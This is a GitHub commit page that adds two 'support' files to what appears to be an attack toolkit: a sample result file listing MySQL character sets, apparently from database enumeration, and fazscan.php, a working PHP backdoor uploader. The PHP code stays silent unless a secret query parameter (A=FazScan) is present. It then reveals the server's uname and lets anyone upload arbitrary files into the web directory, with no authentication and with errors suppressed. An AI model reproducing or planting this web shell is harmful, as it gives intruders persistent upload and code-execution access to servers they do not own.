Skip to content

Commit

Permalink
Support File
Browse files Browse the repository at this point in the history
  • Loading branch information
mfazrinizar authored Mar 25, 2019
1 parent b0d7ce4 commit de08355
Show file tree
Hide file tree
Showing 3 changed files with 7,539 additions and 0 deletions.
33 changes: 33 additions & 0 deletions Results/Example_Result.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
4


big5,big5_chinese_ci,Big5 Traditional Chinese,2

dec8,dec8_swedish_ci,DEC West European,1

cp850,cp850_general_ci,DOS West European,1

hp8,hp8_english_ci,HP West European,1

koi8r,koi8r_general_ci,KOI8-R Relcom Russian,1

latin1,latin1_swedish_ci,cp1252 West European,1

latin2,latin2_general_ci,ISO 8859-2 Central European,1

swe7,swe7_swedish_ci,7bit Swedish,1

ascii,ascii_general_ci,US ASCII,1

ujis,ujis_japanese_ci,EUC-JP Japanese,3

sjis,sjis_japanese_ci,Shift-JIS Japanese,2

hebrew,hebrew_general_ci,ISO 8859-8 Hebrew,1

tis620,tis620_thai_ci,TIS620 Thai,1

euckr,euckr_korean_ci,EUC-KR Korean,2

koi8u,koi8u_general_ci,KOI8-U Ukrainian,1

31 changes: 31 additions & 0 deletions Support/fazscan.php
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@
<html>
<!-- FazScan v1.0 -->
</html>

<?php

error_reporting(0);
set_time_limit(0);

if($_GET['A']=="FazScan") {
echo "<center><b>Uname :".php_uname()."<br></b>";
echo '<font color="black" size="4">';
if(isset($_POST['Submit'])){
$filedir = "";
$maxfile = '2000000';
$mode = '0644';
$userfile_name = $_FILES['image']['name'];
$userfile_tmp = $_FILES['image']['tmp_name'];
if(isset($_FILES['image']['name'])) {
$qx = $filedir.$userfile_name;
@move_uploaded_file($userfile_tmp, $qx);
@chmod ($qx, octdec($mode));
echo " <a href=$userfile_name><center><b>Success Uploaded :) --> $userfile_name</b></center></a>";
}
} else {
echo '<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
}
echo '</center></font>';

}
?>
Loading

0 comments on commit de08355

Please sign in to comment.